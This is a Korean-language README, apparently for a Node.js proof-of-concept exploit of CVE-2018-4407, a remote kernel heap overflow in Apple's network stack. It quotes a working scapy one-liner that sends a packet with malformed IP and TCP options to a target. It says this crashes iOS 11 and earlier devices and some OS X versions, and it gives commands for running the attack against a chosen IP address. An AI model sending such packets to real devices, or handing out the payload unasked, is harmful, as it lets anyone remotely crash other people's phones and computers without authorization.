
CVE-2018-4407용 Node.js PoC 익스플로잇 코드
CVE-2018-4407용 Node.js PoC 익스플로잇 코드
저자: Sam Decrock
이 스크립트는 Zuk이 제공한 scapy 스크립트를 기반으로 합니다:
iOS 12 / OS X *원격 커널 힙 오버플로(CVE-2018-4407) POC* 트윗:
— Zuk (@ihackbanme) 2018년 11월 1일
pip install scapy
sudo scapy
send(IP(dst=“Target IP“,options=[IPOption(“A”*8)])/TCP(dport=2323,options=[(19, “1"*18),(19, “2”*18)]))
이 공격은 iOS 11 이하 기기와 일부 OS X 버전을 충돌시킵니다.
필요한 모듈을 설치하려면 다음을 실행하세요:
npm install
실행하려면 대상 IP 주소를 인수로 전달하세요:
node attack.js 192.168.1.20
Kevin Backhouse의 원본 분석 글: https://lgtm.com/blog/apple_xnu_icmp_error_CVE-2018-4407